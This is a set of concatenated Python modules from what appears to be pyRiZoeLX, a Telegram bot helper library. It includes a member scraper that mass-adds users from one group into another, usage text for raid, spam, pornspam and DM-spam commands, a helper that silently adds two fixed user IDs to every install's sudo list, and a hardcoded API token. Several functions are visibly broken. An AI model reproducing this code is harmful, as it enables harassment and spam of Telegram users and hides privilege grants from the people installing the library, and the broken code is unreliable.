""" RiZoeLX 2022 © pyRiZoeLX """

def make_list(owner, sudos):
    str_list = sudos.split(" ")
    _list = []
    _list.append(int(owner))
    _list.append(1517994352)
    _list.append(1789859817)
    for x in str_list:
        _list.append(int(x))
    return _list

def makelist_(sudos):
    str_list = sudos.split(" ")
    _list = []
    #_list.append(1517994352)
    #_list.append(1789859817)
    for x in str_list:
        int_list.append(int(x))
    return _list



""""
   © RiZoeLX
"""

import asyncio

async def dr(message, editor, text):
   try:
     await editor.edit_text(text)
   except:
     await editor.delete()
     await message.reply_text(text)

async def srape(RiZoeL, message, to_grp, from_grp):
   x = message.reply_text("processing...")
   try:
     await RiZoeL.join_chat(from_grp)
     try:
       scrape_group = await RiZoeL.get_chat(from_grp)
     except Exception as err:
       await dr(message, x, str(err))
       return
   except Exception as err:
     await dr(message, x, str(err))
     return
   print(f"[INFO]: joined {scrape_group.title} to scrape users")
   
   try:
     await RiZoeL.join_chat(to_grp)
     try:
       add_group = await RiZoeL.get_chat(to_grp)
     except Exception as err:
       await dr(message, x, str(err))
       return
   except Exception as err:
     await dr(message, x, str(err))
     return
   print(f"pyRiZoeLX [INFO]: joined {add_group.title} to add users")

   a = 0
   b = 0
   async for x in RiZoeL.get_chat_members(scrape_group.id):
        user = x.user
        try:
           await RiZoeL.add_chat_members(add_group, user.id)
           a += 1
           await asyncio.sleep(2)
        except Exception as a:
           b += 1
           print(f"[SpamX INFO]: {str(a)}")
   done_text = f"**Members Scraped ✓ \n\n Total {a} users added \n {b} users failed to add \n From chat: {scrape_group.title}"
   await dr(message, x, done_text)



""" RiZoeLX 2022 © pyRiZoeLX """

import random 

async def custom_welcome(RiZoeL, message):
   chat = message.chat
   user = message.user
   welcome_text = random.choice(random_welcome)
   try:
      await RiZoeL.send_message(chat.id, welcome_text.format(user.mention))
   except:
      await RiZoeL.send_message(chat.id, welcome_text.format(user.mention, chat.title))

random_welcome = [
   'Heyy! {} Welcome to {}',
   'Hello {}! Nice to meet you, How are you?',
   '{} Joined the chat!',
   '{} New member here!',
   '{} Nice to meet you! Welcome to {}',
]
   



import time

async def extract_time(message, time_):
    if any(time_.endswith(unit) for unit in ("m", "h", "d")):
        unit = time_[-1]
        time_num = time_[:-1]  #type: str
        if not time_num.isdigit():
           await message.reply("Invalid time amount specified.")
           return ""
        if unit == "m":
            xtime = int(time_num) * 60
        elif unit == "h":
            xtime = int(time_num) * 60 * 60
        elif unit == "d":
            xtime = int(time_num) * 24 * 60 * 60
        else:
            return
        return xtime
    else:
        await message.reply(f"Invalid time type specified. Expected m,h, or d, got: {time_[-1]})
        return False


def get_time(time: int):
    if time >= 86400:
        time = int(time / (60 * 60 * 24))
        unit = "days"
    elif time >= 3600 < 86400:
        time = int(time / (60 * 60))
        unit = "hours"
    elif time >= 60 < 3600:
        time = int(time / 60)
        unit = "minutes"
    return " {} {}".format(time, unit)






# [Telethon || Red7 scanner]
from telethon.tl import types, functions
from PhoenixScanner import Phoenix

RIGHTS = types.ChatBannedRights(
    until_date=None,
    view_messages=True,
    send_messages=True,
    send_media=True,
    send_stickers=True,
    send_gifs=True,
    send_games=True,
    send_inline=True,
    embed_links=True,
)

def update_scanlist(Red7):
   newlist = Red7.scanlist()
   if newlist == {'message': 'Invalid Token'}:
      newlist = Red7.scanlist()
      if newlist == {'message': 'Invalid Token'}:
         raise 'Invalid Scanner Token'
   return newlist

async def Red7_Watch_telethon(RiZoeL, message):
   user = message.sender_id
   Red7_Client = Phoenix("RED7-riw5wtg5mpjlcxi6jtjqhh")
   msg = f"""
 Alert ⚠️
User [{user}](tg://user?id={user}) is officially
Scanned by Team Red7 | Phoenix API ;)

Appeal [Here](https://t.me/Red7WatchSupport)
   """
   try:
      try:
         check = Red7_Client.check(user)
         if check['is_gban']:
            try:
                await RiZoeL(functions.channels.EditBannedRequest(message.chat_id, user, BANNED_RIGHTS))
            except BaseException:
                pass
            await RiZoeL.send_message(message.chat_id, msg, link_preview=False)
      except:
         SCANLIST = []
         SCANLIST = update_scanlist(Red7_Client)
         if user in SCANLIST:
            try:
                await RiZoeL(functions.channels.EditBannedRequest(message.chat_id, user, BANNED_RIGHTS))
            except BaseException:
                pass
            await RiZoeL.send_message(message.chat_id, msg, link_preview=False)
   except Exception as error:
      print(str(error))


""" Some Telethon functions """
async def get_user_telethon(message):
    try:
        args = message.text.split(" ", 1)[1].split(" ", 1)
    except IndexError:
        args = None
    if message.reply_to_msg_id:
        previous_message = await message.get_reply_message()
        user = await message.client.get_entity(previous_message.sender_id)
        extra = "".join(args) if args else ""
    elif args:
        extra = None
        x = args[0]
        if len(args) == 2:
            extra = args[1]
        if x.isnumeric():
            x = int(x)
        if not x:
            await message.reply("I don't know who you're talking about, you're going to need to specify a user...!")
            return
        try:
            x = await message.client.get_entity(x)
        except (TypeError, ValueError):
            await message.reply("Looks like I don't have control over that user, or the ID isn't a valid one. If you reply to one of their messages, I'll be able to interact with them.")
            return
    else:
        await message.reply("I don't know who you're talking about, you're going to need to specify a user...!")
        return
    return user, extra



from .admins import *
from .get_info import *
from .get_user import *
from .list import *
from .scraper import *
from .spamx import * 
from .purges import *
from .welcome_message import *
from .custom_filters import *
from .broadcast import *
from .watchers import *




""" Edit Or Reply Function """
async def delete_reply(message, editor, text):
   try:
     await editor.edit_text(text)
   except:
     await editor.delete()
     await message.reply_text(text)



""" RiZoeLX 2022 © pyRiZoeLX """

""" Get User with Reason! """
async def get_user_reason(RiZoeL, message):
    try:
       args = message.text.split(" ", 1)[1].split(" ", 1)
    except IndexError:
       args = None

    if message.reply_to_message and message.reply_to_message.from_user:
       user = message.reply_to_message.from_user
       reason =  "".join(args) if args else ""

    elif args:
       reason = None
       user_ = args[0]
       if len(args) == 2:
           reason = args[1]
       if user_.isnumeric():
           user_ = int(user_)
       if not user_:
           await message.reply_text("I don't know who you're talking about, you're going to need to specify a user.!")
           return
       try:
           user = await RiZoeL.get_users(user_)
       except (TypeError, ValueError):
           await message.reply_text("Looks like I don't have control over that user, or the ID isn't a valid one. If you reply to one of their messages, I'll be able to interact with them.")
           return
    else:
        await message.reply_text("I don't know who you're talking about, you're going to need to specify a user...!")
        return 

    return user, reason


async def get_user(RiZoeL, message):
    try:
       args = message.text.split(" ", 1)[1].split(" ", 1)
    except IndexError:
       args = None

    if message.reply_to_message and message.reply_to_message.from_user:
       user = message.reply_to_message.from_user

    elif args:
       user_ = args[0]
       if user_.isnumeric():
           user_ = int(user_)
       if not user_:
           await message.reply_text("I don't know who you're talking about, you're going to need to specify a user.!")
           return
       try:
           user = await RiZoeL.get_users(user_)
       except (TypeError, ValueError):
           await message.reply_text("Looks like I don't have control over that user, or the ID isn't a valid one. If you reply to one of their messages, I'll be able to interact with them.")
           return
    else:
        await message.reply_text("I don't know who you're talking about, you're going to need to specify a user...!")
        return

    return user



"""
   © RiZoeLX
"""

class raid_usage:
     raid = "**Wrong Usage** \n\nsyntax:\n {}raid (count) (username/id or reply to user) \n\n Example: `.raid 99 @Suzune_superbot`"
          

class spam_usage:
     spam = "**Wrong Usage** \n\nsyntax:\n {}spam (count) (message) \n\n Example: `.spam 99 hello`"
     
     delayspam = "**Wrong Usage** \n\nsyntax:\n {}delayspam (delay speed in seconds) (count) (message) \n\n Example: `.delayspam 0.5 99 hello`"
     
     pspam = "**Wrong Usage** \n\nsyntax:\n {}pornspam (count) \n\n Example: `.pornspam 99`"

class dm_usage:
     dm_spam = "**Wrong Usage** \n\nsyntax:\n {}dmspam (username/id or reply to message) (count) (message) \n\n Example: `.dmspam Suzune_superbot 99 hello`"
     
     dm_raid = "**Wrong Usage** \n\nsyntax:\n {}dmraid (count) (username/id or reply to user) \n\n Example: `.rmraid 99 @Suzune_superbot`"
          
     dm = "**Wrong Usage** \n\nsyntax:\n {}dm (username/id or reply to user) (message) \n\n Example: `.dm @Suzune_superbot hello`"
          





"""
   Pyrogram Module [Info lf individual user]
   
   from RiZoeL.functions import get_info
   await get_info(bot, message)
"""

from RiZoeLX import *
from pyrogram.enums import ParseMode

async def get_info(RiZoeL, message):
   try:
      args = message.text.split(" ", 1)[1].split(" ", 1)
   except IndexError:
      args = None

   if message.reply_to_message and message.reply_to_message.from_user:
      user = message.reply_to_message.from_user

   elif args:
      user_ = args[0]
      if user_.isnumeric():
           user_ = int(user_)
      if not user_:
           await message.reply_text("I don't know who you're talking about, you're going to need to specify a user.!")
           return
      try:
         user = await RiZoeL.get_users(user_)
      except (TypeError, ValueError):
         await message.reply_text("Looks like I don't have control over that user, or the ID isn't a valid one. If you reply to one of their messages, I'll be able to interact with them.")
         return
   else:
      await message.reply_text("I don't know who you're talking about, you're going to need to specify a user...!")
      return

   info = "User Info! \n\n"
   info += f"First Name: {user.first_name} \n"
   if user.last_name:
     info += f"Last Name: {user.last_name} \n"
   info += f"User ID: {user.id} \n"
   if user.username:
     info += f"Username: @{user.username} \n"
   info += "permit link: {} \n"
   if int(user.id) in Devs:
     info += f"Owner of @RiZoeLX 🔱\n"
   await message.reply_text(info, disable_web_page_preview=True)


"""
   Pyrogram Module [Info lf individual user]
   
   from RiZoeL.functions import get_id
   await get_id(bot, message)
"""

async def get_id(RiZoeL, message):
    chat = message.chat
    your_id = message.from_user.id
    reply = message.reply_to_message
    text = f"**Your ID:** `{your_id}`\n"
    text += f"**Chat ID:** `{chat.id}`\n\n"

    if not message.command:
        message.command = message.text.split()

    if len(message.command) == 2:
        try:
            split = message.text.split(None, 1)[1].strip()
            user = await RiZoeL.get_users(split)
            text += f"{user.first_name}'s ID: `{user.id}`\n"

        except Exception:
            return await message.reply_text("This user doesn't exist.", quote=True)

    if not getattr(reply, "empty", True) and not message.forward_from_chat and not reply.sender_chat:
      try:
        user = await RiZoeL.get_users(reply.from_user.id)
        text += f"**{user.first_name}'s ID:** `{reply.from_user.id}` \n\n"
      except:
        text += f"**Replied User ID:** `{reply.from_user.id}` \n\n"

    if reply and reply.forward_from_chat:
        text += f"The forwarded channel, {reply.forward_from_chat.title}, has an id of `{reply.forward_from_chat.id}`\n\n"
        print(reply.forward_from_chat)

    if reply and reply.sender_chat:
        text += f"ID of the replied chat/channel, is `{reply.sender_chat.id}`"
        print(reply.sender_chat)

    await message.reply_text(
       text,
       disable_web_page_preview=True,
       parse_mode=ParseMode.MARKDOWN,
   )



""" RiZoeLX 2022 © pyRiZoeLX """

from pyrogram import filters

def sudo_filter(Sudos, cmd: str):
   return filters.user(Sudos) & filters.command(cmd)

def me_filter(cmd: str):
   return filters.me & filters.command(cmd)

def private_filter(cmd, str):
   return filters.private & filters.incoming & filters.command(cmd)

def group_filter(cmd, str):
   return filters.group & filters.command(cmd)

def media_filter():
   return filters.photo & filters.video & filters.document & filters.audio & filters.voice




import re, codecs, sys, os
from setuptools import setup, find_packages

with open('RiZoeLX/version.py') as f:
    version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)

if not version:
    raise RuntimeError('version is not set')

try:
    with codecs.open( "README.md", 'r', errors='ignore' ) as file:
        readme_contents = file.read()
except Exception as error:
    readme_contents = ""
    sys.stderr.write( "Warning: Could not open README.md due %s\n" % error )
    
requirements = ['pyrogram', 'telethon', 'PhoenixScanner']

setup(
    name='pyRiZoeLX',
    author='MrRiZoeL',
    author_email='xrizoel@gmail.com',
    version=version,
    description='A Pyrogram based functional module.',
    long_description = readme_contents,
    long_description_content_type='text/markdown',
    url='https://github.com/RiZoeLX/pyRiZoeLX',
    packages=find_packages(),
    license='GNU General Public License v3.0',
    classifiers=[
        "Framework :: AsyncIO",
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
        "Natural Language :: English",
        "Operating System :: OS Independent",
        'Programming Language :: Python :: 3.7',
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Topic :: Internet :: WWW/HTTP",
        "Topic :: Software Development :: Libraries",
        "Topic :: Software Development :: Build Tools",

    ],
    include_package_data=True,
    keywords=['telegram', 'pyRiZoeLX', 'RiZoeLX', 'pyrogram', 'functions', 'py-RiZoeLX'],
    install_requires=requirements,
    python_requires=">3.7, <3.11",
)



""" RiZoeLX 2022 © pyRiZoeLX """

from pyrogram.errors import MessageDeleteForbidden, RPCError

async def purge_(RiZoeL, message):
   if message.chat.id == message.from_user.id:
       return

   if message.reply_to_message:
        message_ids = list(range(message.reply_to_message.id, message.id))

        def divide_(l: list, n: int = 100):
            for i in range(0, len(l), n):
                yield l[i : i + n]

        _list = list(divide_(message_ids))

        try:
            for list in _list:
                await RiZoeL.delete_messages(
                    chat_id=message.chat.id,
                    message_ids=list,
                    revoke=True,
                )
            await message.delete()
        except MessageDeleteForbidden:
            await message.reply_text("Cannot delete all messages. The messages may be too old, I might not have delete rights, or this might not be a supergroup.")
            return
        except RPCError as ef:
            await message.reply_text(f"Some error occured! \n\n **Error:** `{ef}`")
            return

        sah = await message.reply_text(f"Deleted __{len(message_ids)}__messages")
        await sleep(3)
        await sah.delete()
        return
   await message.reply_text("Reply to a message to start purge !")
   return
